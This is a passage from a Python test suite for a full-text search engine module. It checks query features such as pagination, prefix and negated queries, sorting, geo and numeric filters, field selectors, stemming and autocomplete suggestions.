        env.assertOk(r.execute_command('ft.add', 'idx', '%d' % i, 1, 'fields',
                                       'foo', 'hello', 'bar', i))
    chunk = 7
    offset = 0
    while True:
        res = r.execute_command(
            'ft.search', 'idx', 'hello', 'nocontent', 'sortby', 'bar', 'desc', 'limit', offset, chunk)
        # Total count is always the full corpus, regardless of the page
        env.assertEqual(res[0], N)
        if offset + chunk > N:
            # Last (possibly short) page
            env.assertTrue(len(res) - 1 <= chunk)
            break
        env.assertEqual(len(res), chunk + 1)
        # Descending by 'bar' means ids count down from N-1
        for n, id in enumerate(res[1:]):
            env.assertEqual(int(id), N - 1 - (offset + n))
        offset += chunk
        chunk = random.randrange(1, 10)
    # Offset at the end of the result set: count only, no ids
    res = r.execute_command(
        'ft.search', 'idx', 'hello', 'nocontent', 'sortby', 'bar', 'asc', 'limit', N, 10)
    env.assertEqual(res[0], N)
    env.assertEqual(len(res), 1)
    # Invalid limits must raise errors
    with env.assertResponseError():
        r.execute_command(
            'ft.search', 'idx', 'hello', 'nocontent', 'limit', 0, -1)
    with env.assertResponseError():
        r.execute_command(
            'ft.search', 'idx', 'hello', 'nocontent', 'limit', -1, 10)
    with env.assertResponseError():
        r.execute_command(
            'ft.search', 'idx', 'hello', 'nocontent', 'limit', 0, 2000000)
def testPrefix(env):
    """Prefix queries ('term*'): expansion, combination with other prefixes
    and negation, and non-matching prefixes; re-checked after RDB reload."""
    r = env
    env.assertOk(r.execute_command(
        'ft.create', 'idx', 'schema', 'foo', 'text'))
    N = 100
    # Every doc has 'constant' plus one of term0..term4
    for i in range(N):
        env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
                                       'foo', 'constant term%d' % (random.randrange(0, 5))))
    for _ in r.retry_with_rdb_reload():
        # Bare 'term' is not a prefix query and matches nothing
        res = r.execute_command(
            'ft.search', 'idx', 'constant term', 'nocontent')
        env.assertEqual([0], res)
        res = r.execute_command(
            'ft.search', 'idx', 'constant term*', 'nocontent')
        env.assertEqual(N, res[0])
        res = r.execute_command(
            'ft.search', 'idx', 'const* term*', 'nocontent')
        env.assertEqual(N, res[0])
        # 'term1*' expands to the term1 subset only
        res = r.execute_command(
            'ft.search', 'idx', 'constant term1*', 'nocontent')
        env.assertGreater(res[0], 2)
        # Negated prefix that covers every doc leaves nothing
        res = r.execute_command(
            'ft.search', 'idx', 'const* -term*', 'nocontent')
        env.assertEqual([0], res)
        # Prefix with no expansions matches nothing
        res = r.execute_command(
            'ft.search', 'idx', 'constant term9*', 'nocontent')
        env.assertEqual([0], res)
def testSortBy(env):
    """SORTBY on text and numeric sortable fields, both directions, plus
    WITHSCORES and WITHSORTKEYS output; re-checked after RDB reload.

    'bar' is set to 100 - i, so sorting by bar desc equals sorting by foo asc.
    """
    r = env
    env.assertOk(r.execute_command(
        'ft.create', 'idx', 'schema', 'foo', 'text', 'sortable', 'bar', 'numeric', 'sortable'))
    N = 100
    for i in range(N):
        env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
                                       'foo', 'hello%03d world' % i, 'bar', 100 - i))
    for _ in r.retry_with_rdb_reload():
        res = r.execute_command(
            'ft.search', 'idx', 'world', 'nocontent', 'sortby', 'foo')
        env.assertEqual([100L, 'doc0', 'doc1', 'doc2', 'doc3',
                         'doc4', 'doc5', 'doc6', 'doc7', 'doc8', 'doc9'], res)
        res = r.execute_command(
            'ft.search', 'idx', 'world', 'nocontent', 'sortby', 'foo', 'desc')
        env.assertEqual([100L, 'doc99', 'doc98', 'doc97', 'doc96',
                         'doc95', 'doc94', 'doc93', 'doc92', 'doc91', 'doc90'], res)
        res = r.execute_command(
            'ft.search', 'idx', 'world', 'nocontent', 'sortby', 'bar', 'desc')
        env.assertEqual([100L, 'doc0', 'doc1', 'doc2', 'doc3',
                         'doc4', 'doc5', 'doc6', 'doc7', 'doc8', 'doc9'], res)
        res = r.execute_command(
            'ft.search', 'idx', 'world', 'nocontent', 'sortby', 'bar', 'asc')
        env.assertEqual([100L, 'doc99', 'doc98', 'doc97', 'doc96',
                         'doc95', 'doc94', 'doc93', 'doc92', 'doc91', 'doc90'], res)
        # WITHSCORES on a sorted query: scores are reported as '0'
        res = r.execute_command('ft.search', 'idx', 'world', 'nocontent',
                                'sortby', 'bar', 'desc', 'withscores', 'limit', '2', '5')
        env.assertEqual(
            [100L, 'doc2', '0', 'doc3', '0', 'doc4', '0', 'doc5', '0', 'doc6', '0'], res)
        # Numeric sort keys are rendered as '#<value>'
        res = r.execute_command('ft.search', 'idx', 'world', 'nocontent',
                                'sortby', 'bar', 'desc', 'withsortkeys', 'limit', 0, 5)
        env.assertListEqual(
            [100L, 'doc0', '#100', 'doc1', '#99', 'doc2', '#98', 'doc3', '#97', 'doc4', '#96'], res)
        # Text sort keys are rendered as '$<value>'
        res = r.execute_command('ft.search', 'idx', 'world', 'nocontent',
                                'sortby', 'foo', 'desc', 'withsortkeys', 'limit', 0, 5)
        env.assertListEqual([100L, 'doc99', '$hello099 world', 'doc98', '$hello098 world', 'doc97', '$hello097 world', 'doc96',
                             '$hello096 world', 'doc95', '$hello095 world'], res)
def testNot(env):
    """Negation: '-term' result sets must be the exact complement of the
    positive query, in all equivalent phrasings."""
    r = env
    env.assertOk(r.execute_command(
        'ft.create', 'idx', 'schema', 'foo', 'text'))
    N = 10
    # Every doc has 'constant' plus one of term0..term4
    for i in range(N):
        env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
                                       'foo', 'constant term%d' % (random.randrange(0, 5))))
    for i in range(5):
        inclusive = r.execute_command(
            'ft.search', 'idx', 'constant term%d' % i, 'nocontent', 'limit', 0, N)
        exclusive = r.execute_command(
            'ft.search', 'idx', 'constant -term%d' % i, 'nocontent', 'limit', 0, N)
        exclusive2 = r.execute_command(
            'ft.search', 'idx', '-(term%d)' % i, 'nocontent', 'limit', 0, N)
        exclusive3 = r.execute_command(
            'ft.search', 'idx', '(-term%d) (constant)' % i, 'nocontent', 'limit', 0, N)
        # Positive and negative counts partition the corpus
        env.assertNotEqual(inclusive[0], N)
        env.assertEqual(inclusive[0] + exclusive[0], N)
        env.assertEqual(exclusive3[0], exclusive2[0])
        env.assertEqual(exclusive3[0], exclusive[0])
        # The id sets must be disjoint complements, identical across phrasings
        s1, s2, s3, s4 = set(inclusive[1:]), set(
            exclusive[1:]), set(exclusive2[1:]), set(exclusive3[1:])
        env.assertTrue(s1.difference(s2) == s1)
        env.assertTrue(s1.difference(s3) == s1)
        env.assertTrue(s1.difference(s4) == s1)
        env.assertTrue(s2 == s3)
        env.assertTrue(s2 == s4)
        env.assertTrue(s2.intersection(s1) == set())
        env.assertTrue(s3.intersection(s1) == set())
        env.assertTrue(s4.intersection(s1) == set())
    # NOT on a non existing term
    env.assertEqual(r.execute_command(
        'ft.search', 'idx', 'constant -dasdfasdf', 'nocontent')[0], N)
    # not on env term
    env.assertEqual(r.execute_command(
        'ft.search', 'idx', 'constant -constant', 'nocontent'), [0])
    env.assertEqual(r.execute_command(
        'ft.search', 'idx', 'constant -(term0|term1|term2|term3|term4|nothing)', 'nocontent'), [0])
    # env.assertEqual(r.execute_command('ft.search', 'idx', 'constant -(term1 term2)', 'nocontent')[0], N)
def testNestedIntersection(env):
    """Intersection queries: every equivalent phrasing (field selectors in
    any order, arbitrary nesting, duplicated terms) must return identical
    results to the flat 'foo bar baz gaz' query."""
    r = env
    env.assertOk(r.execute_command(
        'ft.create', 'idx', 'schema', 'a', 'text', 'b', 'text', 'c', 'text', 'd', 'text'))
    for i in range(20):
        env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
                                       'a', 'foo', 'b', 'bar', 'c', 'baz', 'd', 'gaz'))
    res = [
        r.execute_command('ft.search', 'idx',
                          'foo bar baz gaz', 'nocontent'),
        r.execute_command('ft.search', 'idx',
                          '@a:foo @b:bar @c:baz @d:gaz', 'nocontent'),
        r.execute_command('ft.search', 'idx',
                          '@b:bar @a:foo @c:baz @d:gaz', 'nocontent'),
        r.execute_command('ft.search', 'idx',
                          '@c:baz @b:bar @a:foo @d:gaz', 'nocontent'),
        r.execute_command('ft.search', 'idx',
                          '@d:gaz @c:baz @b:bar @a:foo', 'nocontent'),
        r.execute_command(
            'ft.search', 'idx', '@a:foo (@b:bar (@c:baz @d:gaz))', 'nocontent'),
        r.execute_command(
            'ft.search', 'idx', '@c:baz (@a:foo (@b:bar (@c:baz @d:gaz)))', 'nocontent'),
        r.execute_command(
            'ft.search', 'idx', '@b:bar (@a:foo (@c:baz @d:gaz))', 'nocontent'),
        r.execute_command(
            'ft.search', 'idx', '@d:gaz (@a:foo (@c:baz @b:bar))', 'nocontent'),
        r.execute_command('ft.search', 'idx',
                          'foo (bar baz gaz)', 'nocontent'),
        r.execute_command('ft.search', 'idx',
                          'foo (bar (baz gaz))', 'nocontent'),
        r.execute_command('ft.search', 'idx',
                          'foo (bar (foo bar) (foo bar))', 'nocontent'),
        r.execute_command('ft.search', 'idx',
                          'foo (foo (bar baz (gaz)))', 'nocontent'),
        r.execute_command('ft.search', 'idx', 'foo (foo (bar (baz (gaz (foo bar (gaz))))))', 'nocontent')]
    # Every variant must equal the first (flat) query's result
    # NOTE: the loop variable rebinds the local name 'r'; nothing below uses it
    for i, r in enumerate(res):
        # print i, res[0], r
        env.assertListEqual(res[0], r)
def testInKeys(env):
    """INKEYS: restrict results to an explicit id list; unknown ids yield
    nothing; malformed INKEYS arguments raise errors."""
    r = env
    env.assertOk(r.execute_command(
        'ft.create', 'idx', 'schema', 'foo', 'text'))
    for i in range(200):
        env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
                                       'foo', 'hello world'))
    for _ in r.retry_with_rdb_reload():
        # Several key subsets: result must be exactly the requested ids
        for keys in (
            ['doc%d' % i for i in range(10)], ['doc%d' % i for i in range(0, 30, 2)], [
                'doc%d' % i for i in range(99, 0, -5)]
        ):
            res = r.execute_command(
                'ft.search', 'idx', 'hello world', 'NOCONTENT', 'LIMIT', 0, 100, 'INKEYS', len(keys), *keys)
            env.assertEqual(len(keys), res[0])
            env.assertTrue(all((k in res for k in keys)))
        # Ids that don't exist in the index match nothing
        env.assertEqual(0, r.execute_command(
            'ft.search', 'idx', 'hello world', 'NOCONTENT', 'LIMIT', 0, 100, 'INKEYS', 3, 'foo', 'bar', 'baz')[0])
    # Declared count with missing/invalid key arguments must error
    with env.assertResponseError():
        env.cmd('ft.search', 'idx', 'hello', 'INKEYS', 99)
    with env.assertResponseError():
        env.cmd('ft.search', 'idx', 'hello', 'INKEYS', -1)
    with env.assertResponseError():
        env.cmd('ft.search', 'idx', 'hello', 'inkeys', 4, 'foo')
def testSlopInOrder(env):
    """SLOP and INORDER: slop bounds the allowed distance between query
    terms, inorder additionally requires them in query order.

    Corpus: doc1='t1 t2', doc2='t1 t3 t2', doc3='t1 t3 t4 t2',
    doc4='t1 t3 t4 t5 t2' — i.e. t1..t2 distance grows with the doc number.
    """
    r = env
    env.assertOk(r.execute_command(
        'ft.create', 'idx', 'schema', 'title', 'text'))
    env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1, 'fields',
                                   'title', 't1 t2'))
    env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1, 'fields',
                                   'title', 't1 t3 t2'))
    env.assertOk(r.execute_command('ft.add', 'idx', 'doc3', 1, 'fields',
                                   'title', 't1 t3 t4 t2'))
    env.assertOk(r.execute_command('ft.add', 'idx', 'doc4', 1, 'fields',
                                   'title', 't1 t3 t4 t5 t2'))
    res = r.execute_command(
        'ft.search', 'idx', 't1|t4 t3|t2', 'slop', '0', 'inorder', 'nocontent')
    env.assertEqual({'doc3', 'doc4', 'doc2', 'doc1'}, set(res[1:]))
    # Without inorder, slop 0 allows adjacent terms in either order
    res = r.execute_command(
        'ft.search', 'idx', 't2 t1', 'slop', '0', 'nocontent')
    env.assertEqual(1, res[0])
    env.assertEqual('doc1', res[1])
    # With inorder, 't2 t1' never occurs in that order
    env.assertEqual(0, r.execute_command(
        'ft.search', 'idx', 't2 t1', 'slop', '0', 'inorder')[0])
    # Increasing slop admits docs with larger t1..t2 gaps, one at a time
    env.assertEqual(1, r.execute_command(
        'ft.search', 'idx', 't1 t2', 'slop', '0', 'inorder')[0])
    env.assertEqual(2, r.execute_command(
        'ft.search', 'idx', 't1 t2', 'slop', '1', 'inorder')[0])
    env.assertEqual(3, r.execute_command(
        'ft.search', 'idx', 't1 t2', 'slop', '2', 'inorder')[0])
    env.assertEqual(4, r.execute_command(
        'ft.search', 'idx', 't1 t2', 'slop', '3', 'inorder')[0])
    env.assertEqual(4, r.execute_command(
        'ft.search', 'idx', 't1 t2', 'inorder')[0])
    env.assertEqual(0, r.execute_command(
        'ft.search', 'idx', 't t1', 'inorder')[0])
    env.assertEqual(2, r.execute_command(
        'ft.search', 'idx', 't1 t2 t3 t4')[0])
    env.assertEqual(0, r.execute_command(
        'ft.search', 'idx', 't1 t2 t3 t4', 'inorder')[0])
def testExact(env):
    """Quoted phrases must match only contiguous term sequences, and a
    phrase may be combined with loose terms in the same query."""
    env.assertOk(env.execute_command(
        'ft.create', 'idx', 'schema', 'title', 'text', 'weight', 10.0, 'body', 'text'))
    env.assertOk(env.execute_command(
        'ft.add', 'idx', 'doc1', 0.5, 'fields',
        'title', 'hello world',
        'body', 'lorem ist ipsum'))
    env.assertOk(env.execute_command(
        'ft.add', 'idx', 'doc2', 1.0, 'fields',
        'title', 'hello another world',
        'body', 'lorem ist ipsum lorem lorem'))

    # The phrase "hello world" appears contiguously only in doc1's title
    exact = env.execute_command('ft.search', 'idx', '"hello world"', 'verbatim')
    env.assertEqual(3, len(exact))
    env.assertEqual(1, exact[0])
    env.assertEqual("doc1", exact[1])

    # The phrase "another world" appears contiguously only in doc2's title
    mixed = env.execute_command(
        'ft.search', 'idx', 'hello "another world"', 'verbatim')
    env.assertEqual(3, len(mixed))
    env.assertEqual(1, mixed[0])
    env.assertEqual("doc2", mixed[1])
def testGeo(env):
    """Geo filtering: the GEOFILTER search argument and the inline
    '@field:[lon lat radius unit]' query syntax must return identical
    results for the same center/radius.

    Fix: removed a leftover Python-2 debug statement (`print res`) that
    polluted test output and blocks a Python-3 migration.
    """
    r = env

    def gsearch(query, lon, lat, dist, unit='km'):
        # Search filtered with the explicit GEOFILTER argument
        return r.execute_command('ft.search', 'idx', query, 'geofilter',
                                 'location', lon, lat, dist, unit)

    def gsearch_inline(query, lon, lat, dist, unit='km'):
        # Same filter expressed with the inline geo query syntax
        return r.execute_command(
            'ft.search', 'idx',
            '{} @location:[{} {} {} {}]'.format(query, lon, lat, dist, unit))

    env.assertOk(r.execute_command('ft.create', 'idx',
                                   'schema', 'name', 'text', 'location', 'geo'))
    # hotels rows look like (name, lat, lon, ...); geo values are "lon,lat"
    for i, hotel in enumerate(hotels):
        env.assertOk(r.execute_command(
            'ft.add', 'idx', 'hotel{}'.format(i), 1.0, 'fields', 'name',
            hotel[0], 'location', '{},{}'.format(hotel[2], hotel[1])))

    for _ in r.retry_with_rdb_reload():
        res = r.execute_command('ft.search', 'idx', 'hilton')
        env.assertEqual(len(hotels), res[0])

        res = gsearch('hilton', "-0.1757", "51.5156", '1')
        env.assertEqual(3, res[0])
        env.assertEqual('hotel2', res[5])
        env.assertEqual('hotel21', res[3])
        env.assertEqual('hotel79', res[1])
        res2 = gsearch_inline('hilton', "-0.1757", "51.5156", '1')
        env.assertListEqual(res, res2)

        res = gsearch('hilton', "-0.1757", "51.5156", '10')
        env.assertEqual(14, res[0])
        env.assertEqual('hotel93', res[1])
        env.assertEqual('hotel92', res[3])
        env.assertEqual('hotel79', res[5])
        # 10 km and 10000 m describe the same radius
        res2 = gsearch('hilton', "-0.1757", "51.5156", '10000', 'm')
        env.assertListEqual(res, res2)
        res2 = gsearch_inline('hilton', "-0.1757", "51.5156", '10')
        env.assertListEqual(res, res2)

        res = gsearch('heathrow', -0.44155, 51.45865, '10', 'm')
        env.assertEqual(1, res[0])
        env.assertEqual('hotel94', res[1])
        res2 = gsearch_inline(
            'heathrow', -0.44155, 51.45865, '10', 'm')
        env.assertListEqual(res, res2)

        res = gsearch('heathrow', -0.44155, 51.45865, '10', 'km')
        env.assertEqual(5, res[0])
        env.assertIn('hotel94', res)
        res2 = gsearch_inline(
            'heathrow', -0.44155, 51.45865, '10', 'km')
        env.assertListEqual(res, res2)

        res = gsearch('heathrow', -0.44155, 51.45865, '5', 'km')
        env.assertEqual(3, res[0])
        env.assertIn('hotel94', res)
        res2 = gsearch_inline(
            'heathrow', -0.44155, 51.45865, '5', 'km')
        env.assertListEqual(res, res2)
def testGeoDeletion(env):
    """Deleting or replacing a document must purge its entries from the
    per-field geo sorted-set keys ("geo:idx/<field>")."""
    if env.is_cluster():
        raise unittest.SkipTest()
    # Can't properly test if deleted on cluster
    env.cmd('ft.create', 'idx', 'schema',
            'g1', 'geo', 'g2', 'geo', 't1', 'text')
    env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields',
            'g1', "-0.1757,51.5156",
            'g2', "-0.1757,51.5156",
            't1', "hello")
    env.cmd('ft.add', 'idx', 'doc2', 1.0, 'fields',
            'g1', "-0.1757,51.5156",
            'g2', "-0.1757,51.5156",
            't1', "hello")
    # keys are: "geo:idx/g1" and "geo:idx/g2"; both docs are in each set
    env.assertEqual(2, env.cmd('zcard', 'geo:idx/g1'))
    env.assertEqual(2, env.cmd('zcard', 'geo:idx/g2'))
    # Remove the first doc
    env.cmd('ft.del', 'idx', 'doc1')
    env.assertEqual(1, env.cmd('zcard', 'geo:idx/g1'))
    env.assertEqual(1, env.cmd('zcard', 'geo:idx/g2'))
    # Replace the other one with a doc that has no geo fields — both geo
    # sets should end up empty:
    env.cmd('ft.add', 'idx', 'doc2', 1.0,
            'replace', 'fields',
            't1', 'just text here')
    env.assertEqual(0, env.cmd('zcard', 'geo:idx/g1'))
    env.assertEqual(0, env.cmd('zcard', 'geo:idx/g2'))
def testAddHash(env):
    """FT.ADDHASH must index an existing redis hash under its key name."""
    if env.is_cluster():
        raise unittest.SkipTest()
    r = env
    env.assertOk(r.execute_command('ft.create', 'idx', 'schema',
                                   'title', 'text', 'weight', 10.0, 'body', 'text', 'price', 'numeric'))
    # Documents are created as plain hashes via HMSET, not FT.ADD
    env.assertTrue(
        r.hmset('doc1', {"title": "hello world", "body": "lorem ipsum", "price": 2}))
    env.assertTrue(
        r.hmset('doc2', {"title": "hello werld", "body": "lorem ipsum", "price": 5}))
    env.assertOk(r.execute_command('ft.addhash', 'idx', 'doc1', 1.0))
    env.assertOk(r.execute_command('ft.addhash', 'idx', 'doc2', 1.0))
    res = r.execute_command('ft.search', 'idx', "hello", "nocontent")
    env.assertEqual(3, len(res))
    env.assertEqual(2, res[0])
    env.assertEqual("doc1", res[2])
    env.assertEqual("doc2", res[1])
    # The hash's numeric 'price' field participates in numeric filters
    res = r.execute_command(
        'ft.search', 'idx',
        "hello",
        "filter", "price", "0", "3"
    )
    env.assertEqual(3, len(res))
    env.assertEqual(1, res[0])
    env.assertEqual("doc1", res[1])
    env.assertListEqual(
        ['body', 'lorem ipsum', 'price', '2', 'title', 'hello world'], res[2])
    res = r.execute_command(
        'ft.search', 'idx', "hello werld", "nocontent")
    env.assertEqual(2, len(res))
    env.assertEqual(1, res[0])
    env.assertEqual("doc2", res[1])
def testInfields(env):
    """INFIELDS must restrict query matching to the listed schema fields."""
    r = env
    env.assertOk(r.execute_command(
        'ft.create', 'idx', 'schema', 'title', 'text', 'weight', 10.0, 'body', 'text', 'weight', 1.0))
    env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
                                   'title', 'hello world',
                                   'body', 'lorem ipsum'))
    env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
                                   'title', 'hello world lorem ipsum',
                                   'body', 'hello world'))
    # Both docs carry 'hello world' in the title
    res = r.execute_command(
        'ft.search', 'idx', 'hello world', 'verbatim', "infields", 1, "title", "nocontent")
    env.assertEqual(3, len(res))
    env.assertEqual(2, res[0])
    env.assertEqual("doc2", res[1])
    env.assertEqual("doc1", res[2])
    # Only doc2 carries 'hello world' in the body
    res = r.execute_command(
        'ft.search', 'idx', 'hello world', 'verbatim', "infields", 1, "body", "nocontent")
    env.assertEqual(2, len(res))
    env.assertEqual(1, res[0])
    env.assertEqual("doc2", res[1])
    res = r.execute_command(
        'ft.search', 'idx', 'hello', 'verbatim', "infields", 1, "body", "nocontent")
    env.assertEqual(2, len(res))
    env.assertEqual(1, res[0])
    env.assertEqual("doc2", res[1])
    # Exact phrases also honour the field restriction
    res = r.execute_command(
        'ft.search', 'idx', '\"hello world\"', 'verbatim', "infields", 1, "body", "nocontent")
    env.assertEqual(2, len(res))
    env.assertEqual(1, res[0])
    env.assertEqual("doc2", res[1])
    res = r.execute_command(
        'ft.search', 'idx', '\"lorem ipsum\"', 'verbatim', "infields", 1, "body", "nocontent")
    env.assertEqual(2, len(res))
    env.assertEqual(1, res[0])
    env.assertEqual("doc1", res[1])
    # Several fields may follow the INFIELDS count
    res = r.execute_command(
        'ft.search', 'idx', 'lorem ipsum', "infields", 2, "body", "title", "nocontent")
    env.assertEqual(3, len(res))
    env.assertEqual(2, res[0])
    env.assertEqual("doc2", res[1])
    env.assertEqual("doc1", res[2])
def testScorerSelection(env):
    """Naming the default scorer explicitly works; unknown names error."""
    env.assertOk(env.execute_command(
        'ft.create', 'idx', 'schema', 'title', 'text', 'body', 'text'))
    # TFIDF is the default scorer, so selecting it must succeed
    reply = env.execute_command('ft.search', 'idx', 'foo', 'scorer', 'TFIDF')
    env.assertEqual(reply, [0])
    # A scorer that was never registered must be rejected
    with env.assertResponseError():
        env.execute_command('ft.search', 'idx', 'foo', 'scorer', 'NOSUCHSCORER')
def testFieldSelectors(env):
    """@field: query selectors — case-insensitive field names, unicode
    field names, multi-field '@a|b:' selectors and escaped punctuation."""
    r = env
    env.assertOk(r.execute_command(
        'ft.create', 'idx', 'schema', 'TiTle', 'text', 'BoDy', 'text', "ืืื ืืงืื", 'text', 'field.with,punct', 'text'))
    env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1, 'fields',
                                   'title', 'hello world', 'body', 'foo bar', 'ืืื ืืงืื', 'unicode', 'field.with,punct', 'punt'))
    env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 0.5, 'fields',
                                   'body', 'hello world', 'title', 'foo bar', 'ืืื ืืงืื', 'unicode', 'field.with,punct', 'punt'))
    res = r.execute_command(
        'ft.search', 'idx', '@title:hello world', 'nocontent')
    env.assertEqual(res, [1, 'doc1'])
    res = r.execute_command(
        'ft.search', 'idx', '@body:hello world', 'nocontent')
    env.assertEqual(res, [1, 'doc2'])
    # Each selector scopes only its own term(s); these mixes match nothing
    res = r.execute_command(
        'ft.search', 'idx', '@body:hello @title:world', 'nocontent')
    env.assertEqual(res, [0])
    res = r.execute_command(
        'ft.search', 'idx', '@body:hello world @title:world', 'nocontent')
    env.assertEqual(res, [0])
    # Field names in selectors are matched case-insensitively
    res = r.execute_command(
        'ft.search', 'idx', '@BoDy:(hello|foo) @Title:(world|bar)', 'nocontent')
    env.assertEqual(res, [2, 'doc1', 'doc2'])
    res = r.execute_command(
        'ft.search', 'idx', '@body:(hello|foo world|bar)', 'nocontent')
    env.assertEqual(res, [2, 'doc1', 'doc2'])
    # One selector can name several fields with '|'
    res = r.execute_command(
        'ft.search', 'idx', '@body|title:(hello world)', 'nocontent')
    env.assertEqual(res, [2, 'doc1', 'doc2'])
    res = r.execute_command(
        'ft.search', 'idx', '@ืืื ืืงืื:(unicode)', 'nocontent')
    env.assertEqual(res, [2, 'doc1', 'doc2'])
    # Punctuation inside field names must be backslash-escaped in queries
    res = r.execute_command(
        'ft.search', 'idx', '@field\\.with\\,punct:(punt)', 'nocontent')
    env.assertEqual(res, [2, 'doc1', 'doc2'])
def testStemming(env):
    """Stemming folds 'kitty'/'kitties' together; VERBATIM disables it,
    and an unknown LANGUAGE argument is rejected."""
    env.assertOk(env.execute_command(
        'ft.create', 'idx', 'schema', 'title', 'text'))
    env.assertOk(env.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
                                     'title', 'hello kitty'))
    env.assertOk(env.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
                                     'title', 'hello kitties'))

    # With stemming on, singular and plural both match
    stemmed = env.execute_command(
        'ft.search', 'idx', 'hello kitty', "nocontent")
    env.assertEqual(3, len(stemmed))
    env.assertEqual(2, stemmed[0])

    # VERBATIM leaves only the exact-term match
    verbatim = env.execute_command(
        'ft.search', 'idx', 'hello kitty', "nocontent", "verbatim")
    env.assertEqual(2, len(verbatim))
    env.assertEqual(1, verbatim[0])

    # test for unknown language
    with env.assertResponseError():
        env.execute_command(
            'ft.search', 'idx', 'hello kitty', "nocontent", "language", "foofoofian")
def testExpander(env):
    """Query-expander selection: SBSTEM (the stemming expander),
    'noexpander', and calling a stem directly with VERBATIM."""
    r = env
    env.assertOk(r.execute_command(
        'ft.create', 'idx', 'schema', 'title', 'text'))
    env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
                                   'title', 'hello kitty'))
    # SBSTEM expands 'kitties' so the singular doc still matches
    res = r.execute_command(
        'ft.search', 'idx', 'kitties',
        "nocontent",
        "expander", "SBSTEM"
    )
    env.assertEqual(2, len(res))
    env.assertEqual(1, res[0])
    # 'noexpander' performs no expansion, so the plural finds nothing
    res = r.execute_command(
        'ft.search', 'idx', 'kitties', "nocontent", "expander", "noexpander")
    env.assertEqual(1, len(res))
    env.assertEqual(0, res[0])
    # 'kitti' is the stem of 'kitty', and gets expanded by default
    res = r.execute_command(
        'ft.search', 'idx', 'kitti', "nocontent")
    env.assertEqual(2, len(res))
    env.assertEqual(1, res[0])
    res = r.execute_command(
        'ft.search', 'idx', 'kitti', "nocontent", 'verbatim')
    env.assertEqual(1, len(res))
    env.assertEqual(0, res[0])
    # Calling a stem directly works even with VERBATIM.
    # You need to use the + prefix escaped
    res = r.execute_command(
        'ft.search', 'idx', '\\+kitti', "nocontent", 'verbatim')
    env.assertEqual(2, len(res))
    env.assertEqual(1, res[0])
def testNumericRange(env):
    """Numeric FILTER arguments and the inline @field:[min max] syntax,
    including exclusive '(' bounds, -inf/+inf, and stacked filters."""
    r = env
    env.assertOk(r.execute_command(
        'ft.create', 'idx', 'schema', 'title', 'text', 'score', 'numeric', 'price', 'numeric'))
    # score: 0..99, price: 100..1090 in steps of 10
    for i in xrange(100):
        env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1, 'fields',
                                       'title', 'hello kitty', 'score', i, 'price', 100 + 10 * i))
    for _ in r.retry_with_rdb_reload():
        res = r.execute_command('ft.search', 'idx', 'hello kitty', "nocontent",
                                "filter", "score", 0, 100)
        env.assertEqual(11, len(res))
        env.assertEqual(100, res[0])
        res = r.execute_command('ft.search', 'idx', 'hello kitty', "nocontent",
                                "filter", "score", 0, 50)
        env.assertEqual(51, res[0])
        # '(' prefix makes a bound exclusive: (0, 50) leaves 1..49
        res = r.execute_command('ft.search', 'idx', 'hello kitty', 'verbatim', "nocontent", "limit", 0, 100,
                                "filter", "score", "(0", "(50")
        env.assertEqual(49, res[0])
        res = r.execute_command('ft.search', 'idx', 'hello kitty', "nocontent",
                                "filter", "score", "-inf", "+inf")
        env.assertEqual(100, res[0])
        # test multi filters
        scrange = (19, 90)
        prrange = (290, 385)
        res = r.execute_command('ft.search', 'idx', 'hello kitty',
                                "filter", "score", scrange[
                                    0], scrange[1],
                                "filter", "price", prrange[0], prrange[1])
        # every returned doc must satisfy both ranges
        for doc in res[2::2]:
            sc = int(doc[doc.index('score') + 1])
            pr = int(doc[doc.index('price') + 1])
            env.assertTrue(sc >= scrange[0] and sc <= scrange[1])
            env.assertGreaterEqual(pr, prrange[0])
            env.assertLessEqual(pr, prrange[1])
        env.assertEqual(10, res[0])
        # Disjoint score/price ranges can never both hold
        res = r.execute_command('ft.search', 'idx', 'hello kitty',
                                "filter", "score", "19", "90",
                                "filter", "price", "90", "185")
        env.assertEqual(0, res[0])
        # Test numeric ranges as part of query syntax
        res = r.execute_command(
            'ft.search', 'idx', 'hello kitty @score:[0 100]', "nocontent")
        env.assertEqual(11, len(res))
        env.assertEqual(100, res[0])
        res = r.execute_command(
            'ft.search', 'idx', 'hello kitty @score:[0 50]', "nocontent")
        env.assertEqual(51, res[0])
        res = r.execute_command(
            'ft.search', 'idx', 'hello kitty @score:[(0 (50]', 'verbatim', "nocontent")
        env.assertEqual(49, res[0])
        res = r.execute_command(
            'ft.search', 'idx', '@score:[(0 (50]', 'verbatim', "nocontent")
        env.assertEqual(49, res[0])
        # Negated range: complement of the 49 docs above
        res = r.execute_command(
            'ft.search', 'idx', 'hello kitty -@score:[(0 (50]', 'verbatim', "nocontent")
        env.assertEqual(51, res[0])
        res = r.execute_command(
            'ft.search', 'idx', 'hello kitty @score:[-inf +inf]', "nocontent")
        env.assertEqual(100, res[0])
def testSuggestions(env):
    """FT.SUGADD/SUGGET/SUGLEN/SUGDEL: prefix lookup, INCR, FUZZY, MAX
    and WITHSCORES behaviour of the suggestion dictionary."""
    r = env
    env.assertEqual(1, r.execute_command(
        'ft.SUGADD', 'ac', 'hello world', 1))
    # INCR on an existing entry keeps the dictionary size at 1
    env.assertEqual(1, r.execute_command(
        'ft.SUGADD', 'ac', 'hello world', 1, 'INCR'))
    res = r.execute_command("FT.SUGGET", "ac", "hello")
    env.assertEqual(1, len(res))
    env.assertEqual("hello world", res[0])
    terms = ["hello werld", "hallo world",
             "yellow world", "wazzup", "herp", "derp"]
